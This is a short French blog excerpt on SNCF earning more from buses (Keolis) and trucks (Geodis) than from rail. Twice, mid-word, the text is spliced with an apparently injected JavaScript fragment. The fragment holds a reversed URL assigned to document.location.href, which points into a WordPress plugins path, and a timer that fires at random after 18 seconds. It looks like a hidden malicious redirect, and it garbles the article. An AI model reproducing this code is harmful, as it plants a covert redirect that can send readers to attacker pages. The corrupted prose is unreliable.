Dans son blog du 9 septembre 2010, l’éditoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod »];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torialiste Philippe Escande des Echos constate que le rail n’est plus le premier métier de la SNCF et souligne avec Renaud Honoré que la SNCF devrait s’appeler SNTF, « Société nationale des Transports ». En effet, la SNCF gagne aujourd’hui plus d’argent avec ses autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod »];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tobus (Keolis) et ses camions ( Geodis) qu’avec ses activités ferroviaires, qui ne représentent plus que 45% de ses revenus.…